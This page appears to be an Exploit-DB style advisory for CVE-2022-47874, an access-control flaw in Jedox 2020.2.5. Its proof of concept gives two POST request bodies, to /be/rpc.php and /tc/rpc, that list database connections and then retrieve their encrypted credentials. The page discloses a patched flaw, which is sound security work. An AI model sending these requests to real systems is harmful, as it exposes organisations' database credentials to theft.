header-logo
Suggest Exploit
vendor:
Jedox
by:
Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL
7.4
CVSS
HIGH
Improper Access Controls
284
CWE
Product Name: Jedox
Affected Version From: Jedox 2020.2 (20.2.5) and older
Affected Version To: Jedox 2020.2 (20.2.5)
Patch Exists: YES
Related CWE: CVE-2022-47874
CPE: a:jedox:jedox
Metasploit:
Other Scripts:
Platforms Tested:
2023

Jedox 2020.2.5 – Disclosure of Database Credentials via Improper Access Controls

Improper access controls in /tc/rpc allows remote authenticated users to view details of database connections via the class com.jedox.etl.mngr.Connections and the method getGlobalConnection. To exploit the vulnerability, the attacker must know the name of the database connection.

Mitigation:

Ensure that access controls are properly configured and that only authorized users are able to access sensitive information.
Source

Exploit-DB raw data:

# Exploit Title: Jedox 2020.2.5 - Disclosure of Database Credentials via Improper Access Controls
# Date: 28/04/2023
# Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL
# Vendor Homepage: https://jedox.com
# Version: Jedox 2020.2 (20.2.5) and older
# CVE : CVE-2022-47874


Introduction
=================
Improper access controls in `/tc/rpc` allows remote authenticated users to view details of database connections via the class `com.jedox.etl.mngr.Connections` and the method `getGlobalConnection`. To exploit the vulnerability, the attacker must know the name of the database connection.


Write-Up
=================
See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability.


Proof of Concept
=================
1) List all available database connections via `conn::ls` (see also: CVE-2022-47879):

	PATH: /be/rpc.php
	METHOD: POST
	BODY:
	[
		[
			"conn",
			"ls",
			[
				null,
				false,
				true,
				[
					"type",
					"active",
					"description"
				]
			]
		]
	]

2) Retrieve details of a database connection (specify connection name via CONNECTION) including encrypted credentials using the Java RPC function `com.jedox.etl.mngr.Connection::getGlobalConnection`:

	PATH: /tc/rpc
	METHOD: POST
	BODY:
	[
		[
			"com.jedox.etl.mngr.Connections",
			"getGlobalConnection",
			[
				"<CONNECTION>"
			]
		]
	]

Navigation

Suggest Exploit

Services By CQR